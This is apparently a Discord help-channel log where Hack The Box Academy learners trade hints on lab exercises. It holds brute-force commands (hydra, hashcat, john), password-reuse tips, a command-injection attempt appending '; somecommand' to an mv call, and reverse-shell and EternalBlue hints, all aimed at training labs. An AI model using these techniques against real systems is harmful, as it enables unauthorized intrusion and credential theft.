Always try ftp and hope for pw reuse its 4-6 times faster than ssh and you can do both simultaneously

fathom pendant
rustic sage
#

Right but often ftp is enabled and able to be cracked and in a couple the pw was the same for ssh as it was ftp

#

Just a tip do with it what you will πŸ™‚

tranquil carbon
#

Please ANyone know why i can't upload shell to nibbles on the academy section after obtaining "admin" + "nibbles" ?

rustic sage
#

What’s the exact module section and question? @tranquil carbon

fathom pendant
#

if you could provide more information as to what errors you are receiving

rustic sage
#

Yaaaas we need m0ar data friend @tranquil carbon

fathom pendant
#

because often times the reason why it's not working may be in the error

#

but with just the "it's not working" error... not sure what to tell you friend

pseudo epoch
#

@fathom pendant Yes, that one exactly

fathom pendant
#

i mean

#

the module tells you how to bruteforce it with hydra...

#

you will need to use the provided user/password list

rustic sage
fathom pendant
#

however i "cheated" to get my user list to shorten my time :) (Check C:\Users )

fathom pendant
#

is what it sounds like

tranquil carbon
rustic sage
#

There are 5 pages with nibbles I assume initial foothold tho

#

Or is it privesc

tranquil carbon
pseudo epoch
#

Right, thats what I have been doing. I got the other questions, but for some reason when I try using hydra against rdp it never finds the correct user/pass. Ill give it another go though

fathom pendant
#

remember you have MULTIPLE ports you can listen to on your system

tranquil carbon
fathom pendant
#

like

#

honestly it literally walks you through how to upload your foothold shell and everything

#

remember it's asking you to do a reverse shell not a web shell; so when you UPLOAD you'll need to LISTEN for your shell as well

static roost
#

Not really sure where to ask this question on here: can anyone explain why the RID 500 Admin on the DC can copy the system.hive but SYSTEM on the DC can NOT? That seems really off to me.

fathom pendant
#

Β―_(ツ)_/Β―

static roost
#

@rustic sage yea im scratching my head really hard right now

fathom pendant
#

that sounds more like a google question - could also be that misconfigurations happened

fathom pendant
#

take a look at the payload you are delivering in the <?php> script

#

this is probably one of those cases of you're just blindly following without actually taking notes

#

because this is by far one of the most hand holdy type labs you'll come across; so I definitely suggest paying attention and regoing over some of the module and taking notes

#

as they will probably come in handy later

tranquil carbon
#

Sure thanks man

silver sigil
#

Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer. I am having a hard time finding the flag after performing multiple scans. I have tried vulnerability scan, but any input turns out as wrong.

fathom pendant
#

what's the module and section?

rustic sage
#

@silver sigil sent you a dm

fathom pendant
magic valve
#

For the Passwd, Shadow & Opasswd section on PASSWORD ATTACKS, I unshadowed the .bak files. Created a mutated password list from the custom.rule and password.list file from provided Password-Attacks files.

Ran hashcat with -m 1800 against the unshadowed file and mutated password list. That was unable to crack it. May I have a hint/get some help?

ripe ingot
#

Can Anyone teach me on how to manage, change PW and user name on kali Linux pls?

rustic sage
#

@ripe ingot passwd

ripe ingot
#

Ye

rustic sage
#

just type that and it will change it for current user

ripe ingot
#

Ok wb user name then?

#

I just wanna edit it

#

Or change it prolly

rustic sage
#

usermod -l login-name old-name

silver sigil
dim wolf
#

can anyone nudge me on Pivoting Tunneling and Port Forwarding - Skills Assessment? got ||an RDP session on 172.16.5.35 and trying to figure out how to pivot to 172.16.6.25||

void gate
pseudo epoch
#

@fathom pendant Thanks, your hint on users definitely helped speed things along

modern ingot
#

anybody have a sec for a question? In the Shells and payloads Skills assessment. On the last question

modern ingot
#

It an eternal blue exploit, the machine hangs after it succesfully overwrites the buffer]

#

I get fail everytime

#

Wondering if theres another way to exploit. Im about to upload a shell to the webpage and see if that works instead. The hint says its an eternal blue exploit so idk why its hanging up. others have said the same on forums but never gave the fix

dim wolf
#

i don't remember using eternalblue, let me check again

modern ingot
#

I appreciate you

#

Thank you

dim wolf
#

ok so i did use eternalblue

modern ingot
#

And it worked?

dim wolf
#

yeah it works, what's the output you're getting when you run the exploit?

modern ingot
#

Let me run it again so i can copy and paste it

#

Need discord nitro so i gotta break it up

#

It literally wont let me send it wtf

#

I dmed it

#

wouldnt let me put it in the chat without having discord nitreo

#

nitro*

fathom pendant
#

I feel like i've exhausted every default cred for the mysql part of the password attack module

cinder mortar
dim wolf
#

tomorrow, it begins.

fathom pendant
dim wolf
#

it's one of them

#

and it is in the default creds cheat sheet

fathom pendant
#

i've tried ALL of them or at least I believe I have unless I'm just missing something from the cheatsheet

#

figured it out :^)

#

i wasn't using the list

#

i was using the "improved" list from the sources

#

:^)

dim wolf
#

got a link?

fathom pendant
#

it's in the sources in the github repo

#

basically: I was dumb

dim wolf
#

O

fathom pendant
#

ye

#

yeye

#

now you see

#

i have been

dim wolf
#

skill tissue for your skill issue

cinder mortar
#

anyone can give me a nudge on network enumeration with nmap, bypassing firewall section medium lab?

charred cosmos
#

i need help plz... i posted this in the wrong spot accidentally, so here is the link to it: #web message

kindred prism
fathom pendant
cinder mortar
#

its so weird

#

my own vm gives diff results compared to when i use the web browser instance

fathom pendant
#

sometimes that happens

#

like I said; refresh your vpn by disconnecting and reconnecting

cinder mortar
#

is there any reason its like that?

fathom pendant
#

and then boom you get it there too

fathom pendant
cinder mortar
#

ic sadge

fathom pendant
#

technology is always reliably unreliable :D

cinder mortar
#

:/

vital adder
buoyant drum
#

Hi, I need help with Pivoting, Tunneling, and Port Forwarding(Web Server Pivoting with Rpivot) . I'm doing everything right but I can't browse to the target server.

turbid lily
#

Hi, are there any Modules in the Academy that consider container attacks (like Docker)?

sinful falcon
surreal perch
#

Hi All , Gm , Kindly assist me on Tier 0 - File Transfers module > their first question -("Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer ") >>> how can we get flag.txt (3 points cubes) >>>> i tried accessing on web (both http & https) -ACCESS FORBIDDEN (error 403) & second question , i fetched out the hash by taking RDP (as per mentioned steps in the question2) > SO JUST NEED A BIT OF ASSISTANCE AS nxt sub section- linux file transfer has the same 1st question ) so is it >>> do i need to do directory busting , SQli (OTHER WAYS TO ENUMERATE like we do in OTHER HTB post nmap scans ) OR IS IT ONLY ASKING WGET METHOD TO GET FLAG AS PER QUESTION STATING >>>so bit confused here >>>assistance needed...thanks

tidal kelp
#

so guys need some help. feel really stupid currently on CPTS/Footprinting/IPMI/Password in clear text q.
I'm able to extract the hash, but when using John I get no match when trying with the rockyou word list.
Am I using the wrong syntax: john --wordlists=<path to rockyou> hash.txt

#

the hash it self I copied everything after admin: into a txt file

autumn pilot
#

--wordlist and not plural

tidal kelp
#

did that aswell , didn't work

#

do the txt file need to be in any specific format?

autumn pilot
#

nope

tidal kelp
#

and in the txt file should you keep the username?

#

admin:XXXX etc

autumn pilot
#

depends if you are using hashcat for example you can specify the username to be included with --username

tidal kelp
#

trying with John

autumn pilot
#

experiment

#

it will only cost you like 5 seconds to remove the username, so go for it

tidal kelp
#

dont get to work :/

#

its says its loading it, then just session completed

autumn pilot
#

give it a go with hashcat

placid quest
#

@surreal perch why not use wget http://ip address/flag.txt

turbid lily
tidal kelp
magic valve
#

Anyone happen to have a nudge/hint?

supple jackal
#

is this right

surreal perch
# placid quest <@897540553938452520> why not use wget http://ip address/flag.txt

thanks alllottt .....mayb i was focusing on HTB-boxes-like mindset-duin nmaps-portscan(enum stuff and thn googgling theri version exploits & all other ways - dirb,goburs, burp etc...(even for tier 0 -stuff) πŸ˜€ BUT I WAS BIT SURPRISED WHY THE HELL IT WILL FREAKY HARD BEING IN TIER 0 ...sometimes i was thinking..this way....NEVER THOUGHT IN BASIC GROUND LEVEL STUFF (HA HA HA) >>> mayb all mixing in tier 0,will may b indeed required in tier1 & tier 2...lol anyways thanks alot , much appreciated >>> got in one shot (flag.txt 100%[===================>] 32 --.-KB/s in 0s)

magic valve
#

For the Passwd, Shadow & Opasswd section on PASSWORD ATTACKS, I unshadowed the .bak files. Created a mutated password list from the custom.rule and password.list file from provided Password-Attacks files.

Ran hashcat with -m 1800 against the unshadowed file and mutated password list. That was unable to crack it. May I have a hint/get some help?

placid quest
#

@magic valve use rockyou.txt

supple jackal
#

the reason i as is if it is there is something seriously wrong on my end. Because this would be the 3rd question that has not let me answer if the last week

autumn pilot
#

if the answer is not accepted then it is the wrong answer

magic valve
supple jackal
#

not the case before even the staff have said the answers i have given where right soooo. lol i just dont want to waste my time if i do have the right answer but their is something wrong with the page

#

and everything i look up and research says what i have is the right answer, how else would i atart and http server with npm and start it on port 8080

autumn pilot
#

it is partly correct

supple jackal
#

lol kk i will kepp looking

#

yosh lol no npm so annoyin

fathom pendant
#

ugh i've hit the kira wall

supple jackal
#

wats thats

fathom pendant
#

password attacks module

#

i was dreading this coming up

supple jackal
#

Yosh!! gl

atomic ruin
fathom pendant
# autumn pilot it is partly correct

any tip to nudge me forward on the Password Attacks; Hunting Linux Creds section because SMB is getting me nowhere as it just keeps throwing me up a fake password :C

autumn pilot
#

firefox?

atomic ruin
#

Before or after kira?

fathom pendant
#

before I'm even logged in

#

because I can't ssh in; smb throws up nothing

autumn pilot
#

do you have the password?

atomic ruin
#

Yeah I went through everything in there with the hint, only way I could think of to get a foothold was brute forcing the ssh with the first 25k mutated passwords

autumn pilot
#

was it 25k at the end?

fathom pendant
autumn pilot
#

the exercise (question) gives you a password, have you mutated it?

atomic ruin
autumn pilot
#

doable, however, you are saving quite the time to brute-force it

atomic ruin
magic valve
fathom pendant
#

with the hint; i was able to brute the ftp service in a split second :D

pliant sage
#

hello, I have an mv command question in bash

#

I'm trying to some command injection. I have a website that calls the mv function like so : mv /bla/bla/bla.txt /some/dir/

#

and i would like to append a command after that, like so : mv /bla/bla/bla.txt /some/dir/ ; somecommand

#

except when i try to do that, apparently the mv command picks ;somecommand as the directory it tries to move the file to

#

So is there a way to do what I'm trying to do but better?

atomic ruin
magic valve
atomic ruin
#

Yeah all good

#

But this one I literally just followed the steps in the module

#

Oh I think I know what the issue is! Which user do you want to crack? And are you filtering for that one?

magic valve
#

root. Technically not filtering just root. Will message u with screenshots soon

supple jackal
#

ok im pretty sure i have the right name here or am i out to lunch

devout torrent
#

Check if you have any spaces before or after if you copied the name from terminal

supple jackal
#

lol wow

#

gtg thanks

#

must have been a spcae

turbid lily
fathom pendant
#

can someone sanity check me because apparently now I can't hydra or CME this lab

#

it's just sitting at 1 max thread

#

edit

#

sanity check not needed I'm just tired

magic valve
pliant sage
#

can anybody help with the command injection skill assessment?

fathom pendant
#

make sure you ONLY ask hashcat to do the root user and not ALL the users; and the mutated password from their custom rules is indeed in the list :)

reef adder
#

Hi I am on the cracking into hack the box path and when I unlocked the last module I pressed it twice so it deducted 20 cubes instead of 10 who do I need to speak to get the rebate for the cubes

fathom pendant
#

Support on the site

#

Green bubble

#

If you don't see the chat option select an article, then at bottom of article click sad face

storm jackal
pliant sage
#

I don't get an error, but the command seems to execute into nothing

#

i've tried just having ls as the command but I don't any output either

storm jackal
#

ahh okay i think you're trying command injection on a wrong parameter for that module judging by your use of cp

pliant sage
#

no i know the injection uses mv initially

#

i tried cat too but it didn't work

#

but i just figure cp into the directory i can read through the web app would be the most efficient way of seeing the flag

storm jackal
#

hmm cat is what i used but there's a few different pages to filter through on that assessment for finding the one with correct command injection, dm me if you want

viral trail
#

I want to know what’s the entry level certification for cybersecurity

obtuse quest
#

Hello All. I am working on Information Gathering - Web Edition Virtual host section. I am stuck and cannot get any of the answers in the assessment. I am running the following command.

ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -u http://10.129.221.42/ -H "HOST: FUZZ.inlanefreight.com" -fs 10918

I has also added inlanefreight 10.x.x.x to my /etc/hosts and I am not getting any of the answers.

devout torrent
#

Need to add :FUZZ at end of wordlist I think

obtuse quest
#

doesnt seem to be working

timid grove
#

Hi all, currently doing footprinting module, easy assessment.

Do you guys bruteforce the password after finding the user, or manage to crack the hash ?

dim wolf
#

also use the smallest top subdomains wordlist from seclists

obtuse quest
rustic sage
#

how to verify

obtuse quest
simple zephyr
#

Active Directory - Domain Trust Primer

I found all of the flags, but curious if anyone else had issues running the other commands or if I did something wrong?

dim wolf
#

nah actually the domain is inlanefreight.htb and not inlanefreight.com

obtuse quest
#

Thank you

dim wolf
#

πŸ‘

obtuse quest
tidal kelp
#

so guys, in the Footprinting Module\SMTP . Am I missing something here? How are you suppose to know how to you need to use smtp-user-enum to solve the question ? Am I missing something obvious in the content?

tidal kelp
timid grove
#

ahhh my bad

#

i realise after doing academy in HTB, they dont spoon fed u so much. somethings u have to search on ur own.

#

of course u can do it 1 by 1 using telnet like the example, but sometimes u just have to search for automated tools to assist u

#

its frustrating i know. but thats how htb academy wants us to do i believe

#

depends actually, some people will rely on the material they have in hand and do assignment, so their brain wouldnt want to look outside the material when doing it.

#

what module ?

#

i feel like too many switch on play there

#

i dont think u need -sA and -n

analog tendon
#

sorry is this on the footprinting module?

timid grove
#

looks like it but i dont know what page he is

#

i taking a break from hard footprinting kek

analog tendon
#

oh lol im just about to start that one. i would try a dns* script

timid grove
#

what module is this ?

analog tendon
#

oh wait. sorry i did do that one. this is on the medium lab right?

#

i think hes trying to get the bind.version

#

which is an enum script

#

BUT which vpn are you using? tcp or udp?

timid grove
#

oh

#

just check i've done this one

#

but i totally forget how i did it now

#

HAHAHA

analog tendon
#

oh well then you dont have to worry about that issue. let me see if i can remember what i did and ill DM you a hint. i know UDP is key

timid grove
#

yeah just check my notes

#

u can bring the -n switch back fingerguns

buoyant drum
#

@turbid lily Thanks for the help.

analog tendon
#

ok i was correct. lemme dm you the hit

sly reef
#

@acoustic owl can i DM you?

weak stirrup
#

i working on the bash scripting fundamentals and under the conditional execution i don't think i understand the question. i had add in the for loop code that should effectively do this: if $counter eq 35 then echo ${#var} which i think should output the number of characters in the variable var as it wants but the number i get back is not correct.. what did i misunderstand?

urban anvil
#

hi was anyone able to crack the password for ipmi in footprinting module i am stuck here. i used the command "hashcat --username -m 7300 out.hashcat -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u"

weak stirrup
wraith spoke
#

what module: Password-attack
which part: Password Attacks Lab - Hard
Question: I have found the hash for an account, I am trying to do a pth or invoke the hash but somehow it wo't let me in. can someone check if I am using the right tool/cmdline?

dim wolf
wraith spoke
#

check

scenic plover
#

What module is this again? I might be able to assist you. I don't know if I took notes on the assessments but I might be able to give you a push in the right direction.

tidal kelp
wraith spoke
rose ibex
#

hi

#

i'm new here

#

i want to say

#

which language do you use ,

#

?*

dim wolf
acoustic owl
night pier
#

Has anyone finished the HTTPs/TLS Attacks skills assessment? I need some help finding the vulnerability.

steep loom
#

anyone that has done Attacking Common Services - Easy. please DM. Im at my end trying to figure out what to do with the username i found. I have looked through discord and the form and it seems like im the only one having such trouble with this part....

placid quest
#

@steep loom connect to mssql

steep loom
sly reef
#

@wispy pulsarCan i DM you?

wispy pulsar
#

of course!

umbral river
#

anyone experiencing connection issues to labs? I can load the pages and then for minutes nothing loads.... this is via the vpn connection

rustic sage
#

Hello

#

good evening I would like to learn how to hacker social networks

autumn pilot
#

this is not the place

rustic sage
#

OkeπŸ€·β€β™‚οΈ

#

Oke Thanks

novel matrix
#

Can we please make sure we keep on topic (HTB modules related).

graceful rampart
novel matrix
graceful rampart
#

Will do

wheat garden
#

Need some help on module Active Directory Enumeration & Attacks

section - Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux

question - Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.

thorn urchin
#

if only there was some way channels could be locked down so someone has to verify their account so that people had to read rules and go through some extra steps to reduce spam and direct people to more appropriate channels

graceful rampart
#

πŸ˜† If only it were that easy

wheat garden
graceful rampart
wheat garden
#

oh wait I think I remember doing that earlier in the module

#

checking my notes

graceful rampart
#

Wait, why are you using powershell if your attacking from linux??

#

Just use psexec @wheat garden

devout torrent
#

I am currently doing the Brute force Skill assessment - Website.

The question says
Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

My command is :
hydra -l user -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-10.txt -f 165.232.98.111 -s 32465 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"

What am I missing, since I feel the only thing i needed to change was the php addres, user/pass and fail string ( from the command I recived inside

#

The hint says to use the username found in first part, which is user

#

but I cannot find the password. If anybody can nudge me in a correct direction that would be swell

woeful ermine
#

So, are you getting an error or sth

devout torrent
#

No just the password is not found, I am just wondering where am I going wrong, since using rockyou.txt would take too long, but I browsed the HTB forums and people said rockyou-10 should be enough

woeful ermine
#

then, asked them hahaha

#

my suggestion, if you asked: change and use better one

#

a list with 10 passwords is obviously coming a bit short

#

hello, happy to see you happy

wheat garden
wheat garden
analog tendon
#

oh man that hard footprinting lab felt like it was going everywhere

honest ridge
fathom pendant
#

Take better notes if you're consistently needing the forums

#

It's that simple

honest ridge
#

i feel the sections are right on for notes so i end up just copy/paste them into another thing.. mostly saving helpful commands

fathom pendant
#

Copy/pasting isn't learning

#

It helps reinforce things if you rewrite sections into your own words

#

That way you can get a better grasp of concepts

honest ridge
#

yeah i get that, however its just description of something aka smb ssh etc, but how to use it i do save commands n that,

fathom pendant
#

Even still

#

Typing them out puts it in muscle memory

#

Cause you may get into a scenario where you can't copy/paste

#

Or you need to rewrite the command to bypass filters

graceful rampart
# honest ridge about to start that. even medium was above me, i need tips from htb forums.. is ...

If you have to constantly ask for help or refer to the forums one of two things is happening.
1: You're not actually learning the material (evident from your comment about copy pasting)
2: You aren't trying hard enough. Hacking isn't easy and a lot of the time you're going to struggle. That's part of the learning process. You should not be asking for help if you've spent any less than an hour for some of the easier exercises and longer for some of the harder ones imo

honest ridge
#

i dont think ive articulated it very well sorry, I understand or at least grasp what something is. its more so when i should know something or not.

fathom pendant
graceful rampart
#

You're never going to know everything. Especially in this field it's impossible to ever know everything. A big part of it is learning how to find the answers on your own

scenic walrus
#

I’m finishing up on the getting started module on the pentest path iam trying to upload a shell on the permalink in the get simple cms. I can’t figure out what code to put in there. I don’t want the answer but just a nudge.

fathom pendant
#

Or at least how you're supposed to find the answer

honest ridge
fathom pendant
#

Again it's just one of those things that you'll end up learning over time; also there will be times where you'll need to use Google to help find the answer

honest ridge
#

ohh i always googling lol

fathom pendant
#

But you should be able to get the basic info before searching for answers

#

Step 1: relook at your notes
Step 2: re-evaluate the commands and errors you're receiving
Step 3: adjust accordingly

honest ridge
#

after scans and couple of specific script scans and see whats there i generally go through past content and testing the commands previously given etc then i often hit a wall if something isnt jumping out. probably just because im new and is not somewhat inbuilt yet?

fathom pendant
#

Rarely will there be a requirement to use stuff from other modules, or at least hardcore necessary - aside from basic enumeration

dim wolf
#

thank you mrb3n for the ad attacks module i'm having a blast

fresh reef
#

Currently on Attacking Common Services -Hard and When listing user through task mangr || PS it only shows that Fiona is connected...If this is the case how can i find my impersonation targets other than reading the names of the User's folders? I did and basically guessed the 2nd to last question beacuse that are only 3 choices(I was grasping at straws), I have the creds pulled from all of their files w/n the share (thus how i pwned fiona) but now im stuck on the last question @>@

cedar ferry
#

Did you ever get help with this or figure it out? I'm also stuck on this question and it's quite irritating

devout torrent
#

I have a question, I was doing Skill Assessment - Website in module Login Brute Forcing.
I was stuck on it for quite some time, running the different lists not getting the correct password.
Then I ran the same command same list on pwnbox and got the password in 5 sec.

The command was :

hydra -l user -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt -f 138.68.164.196 -s 30501 http-post-form "/admin_login.php?:user=^USER^&pass=^PASS^:F=<form name='log-in'"

( obviously changed it in pwnbox to compesate for the different url )

But myquestion is, what was I doing wrong in my own virtual machine, so it did not find it.

silk dagger
#

Where's the support chat icon gone? Need some HTB help about my subscription.

devout torrent
#

Mine says :

unkempt drift
supple jackal
#

_("))_/

tribal plume
fathom pendant
tribal plume
#

The part of the module on Subverting Query Logic.

fathom pendant
#

And what has the module taught you so far on how to query for the flag?

#

Since it's SQLI did you inject an SQL query?

tribal plume
#

Use an SQLi on the username password to bypass the query logic. This one uses username OR '1'='1 variety.

#

Yes, I used a simple 'name' or '1'='1' (i.e., a statement tjhat always evaluates to true.

fathom pendant
#

Also what is the question asking?

tribal plume
#

The response says Login successful as <user>

fathom pendant
#

Specifically

tribal plume
#

The questions says "Try to log in as the user'tom' What is the flag value shown after you successfully login?"

fathom pendant
#

So that should be the case, are there rogue spaces?

#

Sometimes an extra space can make the flag value incorrect

tribal plume
#

There don't appear to be any spaces in the response but I suppose it could be on either side.

fathom pendant
#

Are you copying the quotes as well?

tribal plume
#

That seemed to be it, I guess maybe I was grabbing a space on either side when I was copying it.

fathom pendant
#

:)

tribal plume
#

Thanks! Sometimes it's the little things.

fathom pendant
#

Always check your paste formatting because 9/10 times that'll get ya

tribal plume
timid grove
#
#

Nice content, appreciate the lesson.

But i really feel footprinting medium and footprinting hard should swap place.

turbid salmon
#

I have an issue in

  • Module: WINDOWS PRIVILEGE ESCALATION
  • Section: Windows User Privileges
  • Subsection: SeImpersonate and SeAssignPrimaryToken
#

Do you know how to solve this issue? Can someone check if the machine is not broken?

rustic sage
#

same here, have you found the issue?

fathom pendant
fathom pendant
#

I just did this module

rustic sage
#

a strange thing is that i get love ,but when I insert it, it says incorrect

sacred narwhal
#

Hii

fathom pendant
rustic sage
#

no.

#

#zip2john Docs.zip > zip.hash
ver 2.0 efh 5455 efh 7875 Docs.zip/Documentation.docx PKZIP Encr: 2b chk, TS_chk, cmplen=6522, decmplen=9216, crc=B1855553
β”Œβ”€[root@parrot]─[/home/user/Downloads]
└──╼ #john --wordlist=password.list zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 4 needed for performance.
0g 0:00:00:00 DONE (2023-02-02 13:37) 0g/s 2.564p/s 2.564c/s 2.564C/s l

rustic sage
fathom pendant
#

We are not helping you dude stop begging;

#

<@&861185840277487616>

fathom pendant
rustic sage
#

ah, got it, thanks

fathom pendant
rustic sage
little whaleBOT
#

farhaz warrior (1028292654599000116) has been banned until 2023-04-27 12:46:30 (UTC).

languid dawn
dim wolf
dim wolf
turbid salmon
#

Ok I will check that. Thanks πŸ™‚

crisp remnant
#

Someone for a couple of questions about windows privilege escalation module ?

quasi scarab
#

do i need the built in cloud to ssh into target?

#

cus for some reason i cant do it from windows terminal

fathom pendant
#

For any target that's not a web target you need to be connected to the VPN to access it

#

As the boxes are on a separate network and not connected to the internet

quasi scarab
#

ahh i see ok

fathom pendant
#

So if you have a vm

#

Or if you wanna use pwnbox it's more recommended than doing it on your host OS

quasi scarab
#

i would love to but its a payed subscription and i want to test it out first before i do get one

fathom pendant
#

Virtualbox is free and most pentest distros come with OpenVPN for a VPN connection

quasi scarab
#

no i mean like their own vm they got

fathom pendant
#

Yes

quasi scarab
#

hackthebox vm is free if u got a subscription isnt it?

fathom pendant
#

But you can still access the VPN on your own vm

quasi scarab
#

im gon try to get a vm

#

what os do u recommend

#

for vm

fathom pendant
#

I'm using parrot OS; the getting started module talks about how to get started. https://www.parrotsec.org/ they have a htb distro but not necessarily required to download. The only major issue you run into is waiting for some tools to download

graceful rampart
# quasi scarab what os do u recommend

Depends. It all comes down to preference. I use Kali. Other people like to use Parrot. Some people use Ubuntu and just install tool they need on their own

fathom pendant
#

^

graceful rampart
#

Some absolute mad lads use windows

quasi scarab
#

im gonna go with ubuntu

graceful rampart
#

Just note that if you do that you'll have to figure iut how to install many of the tools you need on your own

#

And for many of them, it's not nearly as simple as sudo apt install <toolname>

fathom pendant
#

Also windows defender blocks some of the tools

quasi scarab
#

is there like spesific tools needed for htb?

#

cus if i install ubuntu and like nmap and stuff i get it but

#

do i need to look for spesific stuff to install too

#

other then vpn

fathom pendant
#

Yes

quasi scarab
#

damn alrt

#

do they have like a guilde?

#

or i just do it on my own

fathom pendant
#

Some of them do, some don't, as most people don't run the tools on windows, there's not a lot of documentation on windows installation and usage

graceful rampart